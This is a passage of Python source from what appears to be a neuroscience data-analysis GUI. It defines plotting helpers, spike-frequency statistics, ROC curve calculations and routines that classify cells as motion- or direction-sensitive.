x2.append(flat_list([[i] * len(y) for i, y in enumerate(y_plt[i_grp].T)]))
y.append(y_plt[i_grp].T.flatten())
# plots the separation line
if i_grp > 0:
ax.plot([i_grp - 0.5] * 2, [-1e6, 1e6], 'k--')
# sets up the plot dictionary
_x1, _x2, y = flat_list(x1), flat_list(x2), flat_list(y)
if grp_plot_type == 'Violin/Swarmplot':
# sets up the violin/swarmplot dictionary
vl_dict = setup_sns_plot_dict(ax=ax, x=_x1, y=y, inner=None, hue=_x2, palette=vl_col)
st_dict = setup_sns_plot_dict(ax=ax, x=_x1, y=y, edgecolor='gray', hue=_x2,
split=True, linewidth=1, palette=vl_col)
# creates the violin/swarmplot
h_vl = sns.violinplot(**vl_dict)
h_st = sns.stripplot(**st_dict)
# removes the legend (if only one group)
if n_type == 1:
h_vl._remove_legend(h_vl.get_legend())
h_st._remove_legend(h_st.get_legend())
else:
# sets up the violinplot dictionary
vl_dict = setup_sns_plot_dict(ax=ax, x=_x1, y=y, palette=vl_col)
if n_type > 1:
vl_dict['hue'] = _x2
# creates the violin/swarmplot
h_vl = sns.violinplot(**vl_dict)
# removes the legend (if only one group)
if n_type == 1:
h_vl._remove_legend(h_vl.get_legend())
# sets the x-axis tick marks
ax.set_xlim(ax.get_xlim())
ax.set_xticks(np.arange(n_grp))
else:
# initialisations
xi_tick = np.zeros(n_grp)
for i_grp in range(n_grp):
# sets the x-values for the current group
xi = xi_type + i_grp * (n_type + 1)
n_ex, xi_tick[i_grp] = np.shape(y_plt[i_grp])[0], np.mean(xi)
# plots the separation line
if i_grp > 0:
ax.plot([xi[0] - 1] * 2, [-1e6, 1e6], 'k--')
# creates the graph based on the type
if grp_plot_type == 'Separated Bar':
# case is a separated bar graph
# sets the mean/sem plot values
n_ex = np.sum(~np.isnan(y_plt[i_grp]), axis=0) ** 0.5
y_plt_mn = np.nanmean(y_plt[i_grp], axis=0)
y_plt_sem = np.nanstd(y_plt[i_grp], axis=0) / n_ex
# creates the bar graph
ax.bar(xi, y_plt_mn, yerr=y_plt_sem, color=col[:n_type])
elif grp_plot_type == 'Boxplot':
# case is a boxplot
# creates the boxplot
if np.ndim(y_plt[i_grp]) == 1:
ii = ~np.isnan(y_plt[i_grp])
h_bbox = ax.boxplot(y_plt[i_grp][ii], positions=xi, vert=True, patch_artist=True, widths=0.9)
else:
y_plt_g = [y[~np.isnan(y)] for y in y_plt[i_grp].T]
h_bbox = ax.boxplot(y_plt_g, positions=xi, vert=True, patch_artist=True, widths=0.9)
# resets the colour of the boxplot patches
for i_patch, patch in enumerate(h_bbox['boxes']):
patch.set_facecolor(col[i_patch])
for h_md in h_bbox['medians']:
h_md.set_color('k')
# sets the x-axis tick marks
ax.set_xlim([-1, xi[-1] + 1])
ax.set_xticks(xi_tick)
# creates the
h_plt = []
if n_type > 1:
for i_type in range(n_type):
h_plt.append(ax.bar(-10, 1, color=col[i_type]))
# returns the plot objects
return h_plt
def create_stacked_bar(ax, Y, c):
'''
:param ax:
:param Y:
:param c:
:return:
'''
# initialisations
h_bar, xi_ind = [], np.array(range(np.size(Y, axis=1)))
# creates/appends to the stacked bar graph
for i_type in range(np.size(Y, axis=0)):
if i_type == 0:
# case is the first bar plot stack
h_bar.append(ax.bar(xi_ind, Y[i_type, :], color=c[i_type]))
bar_bottom = Y[i_type, :]
else:
# case is the other bar-plot stacks
h_bar.append(ax.bar(xi_ind, Y[i_type, :], bottom=bar_bottom, color=c[i_type]))
bar_bottom += Y[i_type, :]
# sets the x-axis tick marks
ax.set_xticks(xi_ind)
# returns the bar graph handles
return h_bar
def create_plot_table(ax, data, row_hdr, col_hdr, loc='bottom', bbox=None, rowColours=None,
colColours=None, f_sz=None, colWidths=None, cellColours=None):
'''
:param ax:
:param data:
:param row_hdr:
:param col_hdr:
:return:
'''
# creates the table object
h_table = ax.table(cellText=data, rowLabels=row_hdr, colLabels=col_hdr, loc=loc, rowLoc='center',
cellLoc='center', bbox=bbox, rowColours=rowColours, colColours=colColours,
cellColours=cellColours, colWidths=colWidths)
# h_table.auto_set_column_width(False)
# sets the table font size (if provided)
if f_sz is not None:
h_table.auto_set_font_size(False)
h_table.set_fontsize(f_sz)
# returns the table object
return h_table
def add_rowcol_sum(A):
'''
:param A:
:return:
'''
A_csum = np.hstack((A, np.reshape(np.sum(A, axis=1), (-1, 1))))
return np.vstack((A_csum, np.sum(A_csum, axis=0)))
def create_bubble_boxplot(ax, Y, wid=0.75, plot_median=True, s=60, X0=None, col=None):
'''
:param Y:
:return:
'''
# initialisations
n_plot = len(Y)
if col is None:
col = get_plot_col(len(Y))
#
for i_plot in range(n_plot):
#
dX = wid * (0.5 - np.random.rand(len(Y[i_plot])))
dX -= np.mean(dX)
# creates the bubble plot
if X0 is None:
X = (i_plot + 1) + dX
ax.scatter(X, Y[i_plot], s=s, facecolors='none', edgecolors=col[i_plot])
else:
X = X0[i_plot] + dX
ax.scatter(X, Y[i_plot], s=s, facecolors='none', edgecolors=col[i_plot], zorder=10)
# plots the median line (if required)
if plot_median:
Ymd = np.median(Y[i_plot])
ax.plot((i_plot + 1) + (wid / 2) * np.array([-1, 1]), Ymd * np.ones(2), linewidth=2)
# sets the x-axis limits/ticks
if X0 is None:
ax.set_xlim(0.5, n_plot + 0.5)
ax.set_xticks(np.array(range(n_plot)) + 1)
def create_connected_line_plot(ax, Y, s=60, col=None, X0=None, plot_mean=True):
'''
:param ax:
:param Y:
:param s:
:return:
'''
# initialisations
n_plot, n_cell = len(Y), len(Y[0])
y_mn0, y_mn1 = np.mean(Y[0]), np.mean(Y[1])
#
if col is None:
col = get_plot_col(len(Y))
#
if X0 is None:
X = np.ones((n_cell, 2))
X[:, 1] *= 2
else:
X = repmat(X0, n_cell, 1)
# plots the connecting lines
for i_cell in range(n_cell):
ax.plot(X[i_cell, :], [Y[0][i_cell], Y[1][i_cell]], 'k--')
# creates the scatter plots
ax.scatter(X[:, 0], Y[0], s=s, facecolors='none', edgecolors=col[0], zorder=10)
ax.scatter(X[:, 1], Y[1], s=s, facecolors='none', edgecolors=col[1], zorder=10)
# creates the mean scatter plot points
if plot_mean:
ax.plot([1, 2], [y_mn0, y_mn1], 'k', linewidth=4)
ax.scatter(1, y_mn0, s=2 * s, edgecolors=col[0], zorder=11)
ax.scatter(2, y_mn1, s=2 * s, edgecolors=col[1], zorder=11)
# sets the x-axis limits/ticks
if X0 is None:
ax.set_xlim(0.5, n_plot + 0.5)
ax.set_xticks(np.array(range(n_plot)) + 1)
def det_reqd_cond_types(data, t_type):
'''
:param t_type:
:return:
'''
is_rot_expt = det_valid_rotation_expt(data, t_type=t_type, min_count=1)
return [[z for z in t_type if z in x['rotInfo']['trial_type']]
for x, y in zip(data._cluster, is_rot_expt) if y]
def get_r_stats_values(r_stats_obj, f_key, is_arr=False):
'''
:param r_stats_obj:
:param f_key:
:return:
'''
try:
r_stats_val = r_stats_obj[r_stats_obj.names.index(f_key)]
except:
r_stats_val = list(r_stats_obj)[np.where(r_stats_obj.names == f_key)[0][0]]
if is_arr:
return r_stats_val
elif isinstance(r_stats_val[0], np.ndarray):
return r_stats_val[0][0]
else:
return r_stats_val[0]
def lcm(x, y):
"""This function takes two
integers and returns the L.C.M."""
# choose the greater number
if x > y:
greater = x
else:
greater = y
while(True):
if((greater % x == 0) and (greater % y == 0)):
lcm = greater
break
greater += 1
return lcm
def combine_stacks(x, y):
'''
:param x:
:param y:
:return:
'''
#
n_col_x, n_col_y = np.size(x, axis=1), np.size(y, axis=1)
#
if n_col_x > n_col_y:
n_row_y = np.size(y, axis=0)
y = np.concatenate((y, np.empty((n_row_y, n_col_x - n_col_y), dtype=object)), axis=1)
elif n_col_x < n_col_y:
n_row_x = np.size(x, axis=0)
x = np.concatenate((x, np.empty((n_row_x, n_col_y - n_col_x), dtype=object)), axis=1)
#
return np.dstack((x, y))
def calc_phase_spike_freq(r_obj):
'''
:param r_obj:
:return:
'''
# sets the spiking frequency across all trials
sp_f0 = [sp_freq_fcn(x, y[0]) if np.size(x, axis=0) else None for x, y in zip(r_obj.t_spike, r_obj.t_phase)]
if r_obj.is_single_cell:
sp_f = [np.squeeze(x) if x is not None else None for x in sp_f0]
else:
# if not single cell, then calculate average over all trials
sp_f = [np.mean(x, axis=1) if x is not None else None for x in sp_f0]
# returns the total/mean spiking frequency arrays
return sp_f0, sp_f
def combine_spike_freq(sp_freq, i_dim):
return flat_list([list(sp_freq[i_filt][:, i_dim]) if sp_freq[i_filt] is not None else []
for i_filt in range(len(sp_freq))])
def setup_spike_freq_plot_arrays(r_obj, sp_f0, sp_f, ind_type, n_sub=3, plot_trend=False, is_3d=False):
'''
:param sp_f0:
:param sp_f:
:return:
'''
# memory allocation
A, i_grp = np.empty(n_sub, dtype=object), None
s_plt, sf_trend, sf_stats = dcopy(A), dcopy(A), dcopy(A)
# combines the all the data from each phase type
for i_sub in range(n_sub):
if is_3d:
# case is a 3d scatter plot
s_plt[i_sub] = [combine_spike_freq(sp_f, i) for i in range(3)]
elif r_obj.is_ud:
# case is uniform drifting
if (i_sub + 1) == n_sub:
# case is the CW vs CCW phase
sp_sub = [np.vstack((sp_f[x][:, 1], sp_f[y][:, 1])).T if sp_f0[x] is not None else None
for x, y in zip(ind_type[0], ind_type[1])]
sp_f0_sub = [combine_stacks(sp_f0[x][:, :, 1], sp_f0[y][:, :, 1]) if sp_f0[x] is not None else None
for x, y in zip(ind_type[0], ind_type[1])]
else:
# case is the CW/CCW vs BL phases
sp_sub = np.array(sp_f)[ind_type[i_sub]]
sp_f0_sub = [sp_f0[x] if sp_f0[x] is not None else [] for x in ind_type[i_sub]]
# sets the plot values
s_plt[i_sub] = [combine_spike_freq(sp_sub, i) for i in range(2)]
# calculates the wilcoxon signed rank test between the baseline/stimuli phases
# if not r_obj.is_single_cell:
sf_stats[i_sub] = calc_spike_freq_stats(sp_f0_sub, [0, 1])
# adds the trend-line (if selected)
if plot_trend:
sf_trend[i_sub] = calc_spike_freq_correlation(sp_sub, [0, 1])
# sets the cell group indices (over each filter type)
if i_sub == 0:
ii = np.append(0, np.cumsum([np.size(x, axis=0) for x in sp_f0_sub]))
else:
# case is the default plot
i1, i2 = 1 * (i_sub > 1), 1 + (i_sub > 0)
s_plt[i_sub] = [combine_spike_freq(sp_f, i) for i in [i1, i2]]
# calculates the wilcoxon signed rank test between the stimuli phases
# if not r_obj.is_single_cell:
sf_stats[i_sub] = calc_spike_freq_stats(sp_f0, [i1, i2])
# adds the trend-line (if selected)
if plot_trend:
sf_trend[i_sub] = calc_spike_freq_correlation(sp_f, [i1, i2])
# sets the cell group indices (over each filter type)
if i_sub == 0:
N = [np.size(x, axis=0) if x is not None else 0 for x in sp_f0]
ii = np.append(0, np.cumsum(N))
# sets the indices for each filter type grouping
if (not is_3d):
i_grp = [np.array(range(ii[i], ii[i + 1])) for i in range(len(ii) - 1)]
# returns the important arrays
return s_plt, sf_trend, sf_stats, i_grp
def calc_spike_freq_stats(sp_f0, ind, concat_results=True):
'''
:param sp_f0:
:param ind:
:return:
'''
# memory allocation
n_filt = len(sp_f0)
n_row = [np.size(x, axis=0) if (x is not None) else 0 for x in sp_f0]
sf_stats = [np.zeros(nr) for nr in n_row]
# calculates the p-values for each of the trials
for i_filt in range(n_filt):
if n_row[i_filt] > 0:
for i_row in range(n_row[i_filt]):
x, y = sp_f0[i_filt][i_row, :, ind[0]], sp_f0[i_filt][i_row, :, ind[1]]
ii = np.logical_and(~np.equal(x, None), ~np.equal(y, None))
results = r_stats.wilcox_test(FloatVector(x[ii]), FloatVector(y[ii]), paired=True, exact=True)
sf_stats[i_filt][i_row] = get_r_stats_values(results, 'p.value')
# returns the stats array
if concat_results:
return np.concatenate(sf_stats)
else:
return sf_stats
def calc_spike_freq_correlation(sp_f, ind):
'''
:param sp_f:
:param ind:
:param is_single_cell:
:return:
'''
# memory allocation
n_filt = np.size(sp_f, axis=0)
sp_corr = np.nan * np.ones((n_filt, 1))
#
for i_filt in range(n_filt):
# sets the x/y points for the correlation calculation
if sp_f[i_filt] is not None:
x, y = sp_f[i_filt][:, ind[0]], sp_f[i_filt][:, ind[1]]
sp_corr[i_filt], _ = curve_fit(lin_func, x, y)
# returns the correlation array
return sp_corr
##################################################
#### ROC ANALYSIS CALCULATION FUNCTIONS ####
##################################################
def get_roc_xy_values(roc, is_comp=None):
'''
:param roc:
:return:
'''
# retrieves the roc coordinates and returns them in a combined array
roc_ss, roc_sp = get_r_stats_values(roc, 'sensitivities', True), get_r_stats_values(roc, 'specificities', True)
return np.vstack((1-np.array(roc_ss), np.array(roc_sp))).T
def get_roc_auc_value(roc):
'''
:param roc:
:return:
'''
# returns the roc curve integral
return get_r_stats_values(roc, 'auc')
def calc_inter_roc_significance(roc1, roc2, method, boot_n):
'''
:param roc1:
:param roc2:
:return:
'''
# runs the test and returns the p-value
results = _roc_test(roc1, roc2, method=method[0].lower(), boot_n=boot_n, progress='none')
return get_r_stats_values(results, 'p.value')
def calc_roc_curves(comp_vals, roc_type='Cell Spike Times', x_grp=None, y_grp=None, ind=[1, 2]):
'''
:param t_spike:
:return:
'''
# sets up the x/y groupings and threshold values based on type
if (x_grp is None) or (y_grp is None):
if roc_type == 'Cell Spike Times':
# case is the cell spike times
# sets the cw/ccw trial spike arrays
n_trial = np.sum([(x is not None) for x in comp_vals[:, 0]])
t_sp_cc = [comp_vals[i, ind[0]] for i in range(n_trial)] # CW trial spikes
t_sp_ccw = [comp_vals[i, ind[1]] for i in range(n_trial)] # CCW trial spikes
# determines the spike counts for the cc/ccw trials
x_grp, y_grp = spike_count_fcn(t_sp_cc), spike_count_fcn(t_sp_ccw)
elif roc_type == 'Cell Spike Counts':
# case is the cell spike counts
# sets the pooled neuron preferred/non-preferred trial spike counts
x_grp, y_grp = comp_vals[:, 0], comp_vals[:, 1]
# sets up the roc
nn = len(x_grp)
roc_pred, roc_class = np.hstack((np.zeros(nn), np.ones(nn))), np.hstack((x_grp, y_grp))
return r_pROC.roc(FloatVector(roc_pred), FloatVector(roc_class), direction = "<", quiet=True)
# def calc_cell_roc_bootstrap_wrapper(p_data):
# '''
#
# :param p_data:
# :return:
# '''
#
# # initialisations
# t_spike, n_boot, ind = p_data[0], p_data[1], p_data[2]
#
# # sets the cw/ccw trial spike arrays
# n_trial = np.sum([(x is not None) for x in t_spike[:, 0]])
# t_sp_p1 = [t_spike[i, ind[0]] for i in range(n_trial)] # 1st phase trial spikes
# t_sp_p2 = [t_spike[i, ind[1]] for i in range(n_trial)] # 2nd phase trial spikes
#
# # determines the spike counts for the cc/ccw trials
# n_spike = [spike_count_fcn(t_sp_p1), spike_count_fcn(t_sp_p2)]
#
# return calc_cell_roc_bootstrap(None, n_spike, n_boot=n_boot, ind=ind)
def calc_roc_conf_intervals(p_data):
'''
:param roc:
:param type:
:param n_boot:
:return:
'''
# parameters and input arguments
roc, grp_stype, n_boot, c_lvl = p_data[0], p_data[1], p_data[2], p_data[3]
# calculates the roc curve integral
results = _ci_auc(roc, method=grp_stype[0].lower(), boot_n=n_boot, conf_level=c_lvl, progress='none')
return [results[1] - results[0], results[2] - results[1]]
def calc_cell_group_types(auc_sig, stats_type):
'''
:param auc_sig:
:return:
'''
# memory allocation
# Cell group type convention
# =0 - Both MS/DS
# =1 - MS but not DS
# =2 - Not MS
g_type = 2 * np.ones(np.size(auc_sig, axis=0), dtype=int)
# determines which cells are motion/direction sensitive
# * Motion Sensitive - either (one direction only is significant), OR (both are significant AND
# the CW/CCW phase difference is significant)
n_sig = np.sum(auc_sig[:, :2], axis=1)
is_ms = n_sig > 0
#
if stats_type == 'Wilcoxon Paired Test':
# case is if phase statistics ws calculated via Wilcoxon paried test
is_ds = np.logical_or(n_sig == 1, np.logical_and(n_sig == 2, auc_sig[:, 2]))
else:
# case is if phase stats was calculated using ROC analysis
is_ds = auc_sig[:, 2]
# sets the MS/DS and MS/Not DS indices
g_type[np.logical_and(is_ms, is_ds)] = 0 # case is both MS/DS
g_type[np.logical_and(is_ms, ~is_ds)] = 1 # case is MS but not DS
# returns the group type array
return g_type
# # calculates the table dimensions
# bbox, t_data, cell_col, c_wids = cf.calc_table_dim(self.plot_fig, 1, table_font, n_sig_grp, row_hdr,
# row_cols, g_type, t_loc='bottom')
# bbox, t_data, cell_col, c_wids = cf.add_plot_table(self.plot_fig, 1, table_font, n_sig_grp, row_hdr,
# g_type, row_cols, col_cols, table_fsize, t_loc='bottom')
# calculates the table dimensions
def add_plot_table(fig, ax, font, data, row_hdr, col_hdr, row_cols, col_cols, t_loc, cell_cols=None,
n_row=1, n_col=2, pfig_sz=1.0, t_ofs=0, h_title=None, p_wid=1.5, ax_pos_tbb=None):
'''
:param ax:
:param font:
:param data:
:param row_hdr:
:param col_hdr:
:return:
'''
# initialisations
n_line, title_hght, pWT = 0, 0, 0.5
y0, w_gap, h_gap, cell_wid, cell_wid_row, n_row_data = 0.01, 10 * p_wid, 2, 0, 0, np.size(data, axis=0)
# creates the font metrics object
fm, f_sz0 = QFontMetrics(font), font.pointSize()
# sets the axis object (if the axis index was provided)
if isinstance(ax, int):
ax = fig.ax[ax]
# retrieves the bounding box position array (if not provided)
if ax_pos_tbb is None:
ax_pos_tbb = ax.get_tightbbox(fig.get_renderer()).bounds
# objection dimensioning
fig_wid, fig_hght = fig.width(), fig.height() * pfig_sz
cell_hght0, ax_wid, ax_hght, ax_pos = fm.height(), ax.bbox.width, ax.bbox.height, ax.get_position()
# if there is a title, then retrieve the title height
if h_title is not None:
fm_title = QFontMetrics(create_font_obj(size=h_title.get_fontsize()))
title_hght = fm_title.height()
if t_loc == 'bottom':
# case is the table is located at the bottom of the axes
# if there is an x-label then increment the line counter
if ax.xaxis.label is not None:
n_line += 1
# if there is an x-ticklabels then increment the line counter depending on the number of lines
h_xticklbl = ax.get_xticklabels()
if h_xticklbl is not None:
n_line += np.max([(1 + x._text.count('\n')) for x in h_xticklbl])
elif t_loc == 'top':
# case is the table is located at the top of the axes
# case is the title
if len(ax.title._text):
n_line += 1
# parameters and other dimensioning
n_rowhdr_line = 0 if row_hdr is None else row_hdr[0].count('\n') + 1
n_colhdr_line = 0 if col_hdr is None else col_hdr[0].count('\n') + 1
############################################
#### CELL ROW/HEIGHT CALCULATIONS ####
############################################
# calculates the maximum column header width
if col_hdr is not None:
cell_wid = np.max([fm.width(x) for x in col_hdr]) * p_wid
# calculates the maximum of the cell widths
for i_row in range(n_row_data):
cell_wid = max(cell_wid, np.max([fm.width(str(x)) for x in data[i_row, :]]) * p_wid)
# calculates the maximum row header width
if row_hdr is not None:
cell_wid_row = np.max([fm.width(x) for x in row_hdr]) * p_wid
# sets the row header/whole table widths and cell/whole table heights
table_wid = ((cell_wid_row > 0) * (cell_wid_row + w_gap) + len(col_hdr) * (cell_wid + w_gap)) / ax_wid
table_hght = (n_colhdr_line * cell_hght0 + (n_colhdr_line + 1) * h_gap + \
n_row_data * (cell_hght0 + (n_rowhdr_line + 1) * h_gap))
# if the table width it too large, then rescale
sp_width = get_axes_tight_bbox(fig, ax_pos_tbb, pfig_sz)[2] / ax.get_position().width
if table_wid > sp_width:
ptable_wid = sp_width / table_wid
cell_wid, cell_wid_row = ptable_wid * cell_wid, ptable_wid * cell_wid_row
table_wid = sp_width
if t_loc == 'bottom':
ax_bot = np.floor(ax_pos.y1 / (1 / n_row)) / n_row
ax_y0, ax_y1 = ax_bot * fig_hght + table_hght + cell_hght0 * (1.5 + n_line), ax.bbox.y1
elif t_loc == 'top':
ax_top = np.ceil(ax_pos.y1 / (1 / n_row)) / n_row
ax_y0, ax_y1 = ax.bbox.y0, ax_top * fig_hght - (table_hght + 2 * cell_hght0)
elif t_loc == 'fixed':
ax_y0, ax_y1 = ax.bbox.y0, ax.bbox.y1
else:
ax_y0 = fig_hght * np.floor(ax_pos.y0 / (1 / n_row)) / n_row
ax_y1 = fig_hght * np.ceil(ax_pos.y1 / (1 / n_row)) / n_row
# sets the bounding box dimensions
ax_hght_new = pfig_sz * (ax_y1 - ax_y0) / fig_hght
ax_fig_hght = ax_hght_new * fig_hght
table_x0 = get_axis_scaled_xval(ax, fig, ax_pos_tbb, (1 - table_wid) / 2, pfig_sz)
if t_loc == 'bottom':
table_y0 = -(table_hght + (1 + pWT) * title_hght + cell_hght0 * (1 + n_line)) / ax_fig_hght
bbox = [table_x0, table_y0, table_wid, table_hght / ax_fig_hght]
elif t_loc == 'top':
table_y0 = 1 + (cell_hght0 + (1 + pWT) * title_hght) / ax_fig_hght
bbox = [table_x0, table_y0, table_wid, table_hght / ax_fig_hght]
else:
table_y0 = 1 - (t_ofs + table_hght + (1 + pWT) * title_hght + cell_hght0) / ax_fig_hght
bbox = [table_x0, table_y0, table_wid, table_hght / ax_fig_hght]
####################################################
#### AXIS RE-POSITIONING & TABLE CREATION ####
####################################################
# resets the axis position to accomodate the table
if t_loc != 'fixed':
ax_pos_nw = [ax_pos.x0, ax_y0 / fig_hght, ax_pos.width, ax_hght_new]
ax.set_position(ax_pos_nw)
# resets the position of the title object
if h_title is not None:
x_title = get_axis_scaled_xval(ax, fig, ax_pos_tbb, 0.5, pfig_sz, False)
h_title.set_position([x_title, table_y0 + (table_hght + pWT * title_hght) / ax_fig_hght])
# sets the table parameters based on whether there is a row header column
if cell_wid_row == 0:
# case is there is no row header column
c_wids = [cell_wid + w_gap] * len(col_hdr)
else:
# case is there is a row header column
c_wids = [cell_wid_row + w_gap] + [cell_wid + w_gap] * len(col_hdr)
#
if cell_cols is None:
cell_cols = np.vstack([['w'] * np.size(data, axis=1)] * np.size(data, axis=0))
# resets the data and column header arrays
data = np.hstack((np.array(row_hdr).reshape(-1, 1), data))
col_hdr, col_cols = [''] + col_hdr, ['w'] + col_cols
#
if np.size(data, axis=0) == 1:
cell_cols = np.array(row_cols + list(cell_cols[0]), dtype=object).reshape(-1, 1).T
else:
cell_cols = np.hstack((np.array(row_cols, dtype=object).reshape(-1, 1), cell_cols))
# creates the table
h_table = create_plot_table(ax, data, None, col_hdr, bbox=bbox, colWidths=c_wids, cellColours=cell_cols,
colColours=col_cols, f_sz=f_sz0)
# removes the outline from the top-left cell
h_table._cells[(0, 0)].set_linewidth(0)
# returns the cell width/height
return [h_table, table_y0, ax_fig_hght]
def get_axes_tight_bbox(fig, ax_pos_tbb, pfig_sz=1.):
'''
:param fig:
:param ax:
:return:
'''
# retrieves the figure width/height
fig_wid, fig_hght = fig.width(), fig.height() * pfig_sz
r_fig_pos = np.array([fig_wid, fig_hght, fig_wid, fig_hght])
# returns the
return ax_pos_tbb / r_fig_pos
def get_subplot_width(fig, ax, n_col):
'''
:param ax:
:return:
'''
return (t_wid_f / n_col) / ax.get_position().width
def get_axis_scaled_xval(ax, fig, ax_pos_tbb, x, pfig_sz, is_scaled=True):
'''
:param ax:
:param x:
:return:
'''
# retrieves the axis normal/tight position vector
ax_pos = np.array(ax.get_position().bounds)
ax_pos_t = get_axes_tight_bbox(fig, ax_pos_tbb, pfig_sz)
# sets the column locations (for each column)
# pp = np.linspace(x_ofs + (ax_pos_t[0] - ax_pos[0]) / ax_pos[2],
# (1 - x_ofs) + ((ax_pos_t[0] + ax_pos_t[2]) - (ax_pos[2] + ax_pos[0])) / ax_pos[2], n_col + 1)
# i_col = int(np.floor(ax_pos[0] / (1 / n_col)) / n_col)
# calculates the subplot axis left/right location
x_ofs = (1 - t_wid_f) / (2 * ax_pos_t[2])
sp_left = x_ofs + (ax_pos_t[0] - ax_pos[0]) / ax_pos[2]
sp_right = (1 - x_ofs) + ((ax_pos_t[0] + ax_pos_t[2]) - (ax_pos[2] + ax_pos[0])) / ax_pos[2]
# returns the scaled value
if is_scaled:
return sp_left + x * (sp_right - sp_left)
else:
return sp_left + x * (sp_right - sp_left)
def reset_axes_dim(ax, d_type, d_val, is_prop):
'''
:param ax:
:param d_type:
:param d_val:
:param is_prop:
:return:
'''
#
ax_pos0 = ax.get_position()
ax_pos = [ax_pos0.x0, ax_pos0.y0, ax_pos0.width, ax_pos0.height]
i_dim = ['left', 'bottom', 'width', 'height'].index(d_type.lower())
if is_prop:
ax_pos[i_dim] *= (1 + d_val)
else:
ax_pos[i_dim] = d_val
#
ax.set_position(ax_pos)
def setup_trial_condition_filter(rot_filt, plot_cond):
'''
:param plot_cond:
:return:
'''
if not isinstance(plot_cond, list):
plot_cond = [plot_cond]
# determines the unique trial types within the experiment that match the required list
if len(plot_cond) == 0:
# if the black phase is not in any of the experiments, then output an error to screen
e_str = 'At least one trial condition type must be selected before running this function.'
return None, e_str, 'No Trial Conditions Selected'
else:
t_type_exp = ['Black'] + plot_cond
# initialises the rotation filter (if not set)
if rot_filt is None:
rot_filt = init_rotation_filter_data(False)
# sets the trial types into the rotation filter
rot_filt['t_type'] = list(np.unique(flat_list(t_type_exp)))
if 'Black' not in rot_filt['t_type']:
# if the black phase is not in any of the experiments, then output an error to screen
e_str = 'The loaded experiments do not include the "Black" trial condition. To run this function ' \
'you will need to load an experiment with this trial condition.'
return None, e_str, 'Invalid Data For Analysis'
elif len(rot_filt['t_type']) == 1:
# if there are insufficient trial types in the loaded experiments, then create the error string
e_str = 'The loaded experiments only has the "{0}" trial condition. To run this function you will ' \
'need to load a file with the following trial condition:\n'.format(rot_filt['t_type'][0])
for tt in plot_cond:
e_str = '{0}\n => {1}'.format(e_str, tt)
# outputs the error to screen and exits the function
return None, e_str, 'Invalid Data For Analysis'
# otherwise, return the rotational filter
return rot_filt, None, None
def det_matching_filters(r_obj, ind):
'''
:param r_obj:
:param ind:
:return:
'''
# sets the candidate rotation filter dictionary
r_filt0 = r_obj.rot_filt_tot[ind]
# loops through each of the filter dictionaries determining the match
for i in range(len(r_obj.rot_filt_tot)):
# if the current index is
if i == ind:
continue
# loops through each of the field values determining if they all match
is_match = True
for f_key in r_filt0.keys():
# no need to consider the trial type field
if f_key == 't_type':
continue
# if the field values do not match, then update the match flag and exit the loop
if r_filt0[f_key] != r_obj.rot_filt_tot[i][f_key]:
is_match = False
break
# if all the fields match, then return the matching index
if is_match:
return [ind, i]
def calc_ms_scores(s_plt, sf_stats, p_value=0.05):
'''
:param s_plt:
:param sf_stats:
:return:
'''
#
if p_value is not None:
# calculates the relative change for CW/CCW from baseline, and CCW to CW
grad_CW = np.array(s_plt[0][1]) / np.array(s_plt[0][0]) # CW to BL
grad_CCW = np.array(s_plt[1][1]) / np.array(s_plt[1][0]) # CCW to BL
grad_CCW_CW = np.array(s_plt[1][1]) / np.array(s_plt[0][1]) # CCW to CW
# calculates the score type for the CW/CCW phases
sf_score = np.zeros((len(grad_CW), 3), dtype=int)
# case is the statistical significance has already been calculated (which is the case for ROC)
sf_score[:, 0] = (sf_stats[0] < p_value).astype(int) * (1 + (grad_CW > 1).astype(int))
sf_score[:, 1] = (sf_stats[1] < p_value).astype(int) * (1 + (grad_CCW > 1).astype(int))
# if both CW and CCW are significant (wrt the baseline phase), then determine from these cells which
# cells have a significant CW/CCW difference (1 for CW, 2 for CCW, 0 otherwise):
# 1) significant for a single direction (either CW or CCW preferred)
# 2) significant for both, but the CCW/CW gradient is either > 1 (for CCW preferred) or < 1 (for CW preferred)
# case is the statistical significance needs to be calculated
both_sig = np.logical_and(sf_score[:, 0] > 0, sf_score[:, 1] > 0)
sf_score[both_sig, 2] = (sf_stats[2][both_sig] < p_value).astype(int) * \
(1 + (grad_CCW_CW[both_sig] > 1).astype(int))
else:
# calculates the score type for the CW/CCW phases
sf_score = np.zeros((np.size(s_plt, axis=0), 3), dtype=int)
# case is the statistical significance needs to be calculated
sf_score[:, 0] = sf_stats[:, 0].astype(int) * (1 + (s_plt[:, 0] > 0.5).astype(int))
sf_score[:, 1] = sf_stats[:, 1].astype(int) * (1 + (s_plt[:, 1] > 0.5).astype(int))
sf_score[:, 2] = sf_stats[:, 2].astype(int) * (1 + (s_plt[:, 2] > 0.5).astype(int))
# returns the scores array
return sf_score
def det_cell_match_indices(r_obj, ind, r_obj2=None):
'''
:param r_obj:
:param ind:
:return:
'''
if r_obj2 is None:
# determines the cell id's which overlap each other
cell_id = [10000 * r_obj.i_expt[i] + np.array(flat_list(r_obj.clust_ind[i])) for i in ind]
id_match = np.array(list(set(cell_id[0]).intersection(set(cell_id[1]))))
# returns the indices of the matching
return np.searchsorted(cell_id[0], id_match), np.searchsorted(cell_id[1], id_match)
else:
#
if isinstance(ind, int):
cell_id_1 = 10000 * r_obj.i_expt[ind] + np.array(flat_list(r_obj.clust_ind[ind]))
cell_id_2 = 10000 * r_obj2.i_expt[ind] + np.array(flat_list(r_obj2.clust_ind[ind]))
else:
cell_id_1 = 10000 * r_obj.i_expt[ind[0]] + np.array(flat_list(r_obj.clust_ind[ind[0]]))
cell_id_2 = 10000 * r_obj2.i_expt[ind[1]] + np.array(flat_list(r_obj2.clust_ind[ind[1]]))
# returns the indices of the matching cells
id_match = np.sort(np.array(list(set(cell_id_1).intersection(set(cell_id_2)))))
return np.searchsorted(cell_id_1, id_match), np.searchsorted(cell_id_2, id_match)
def split_unidrift_phases(data, rot_filt, cell_id, plot_exp_name, plot_all_expt, plot_scope, dt, t0=0):
'''
:param rot_filt:
:return:
'''
from analysis_guis.dialogs.rotation_filter import RotationFilteredData
# parameters
rot_filt['t_freq_dir'] = ['-1', '1']
# splits the data by the forward/reverse directions
r_obj = RotationFilteredData(data, rot_filt, cell_id, plot_exp_name, plot_all_expt, plot_scope, True,
t_ofs=t0, t_phase=dt)
if not r_obj.is_ok:
return None, None
# shortens the stimuli phases to the last/first dt of the baseline/stimuli phases
t_phase, n_filt = r_obj.t_phase[0][0], int(r_obj.n_filt / 2)
ind_type = [np.where([tt in r_filt['t_freq_dir'] for r_filt in
r_obj.rot_filt_tot])[0] for tt in rot_filt['t_freq_dir']]
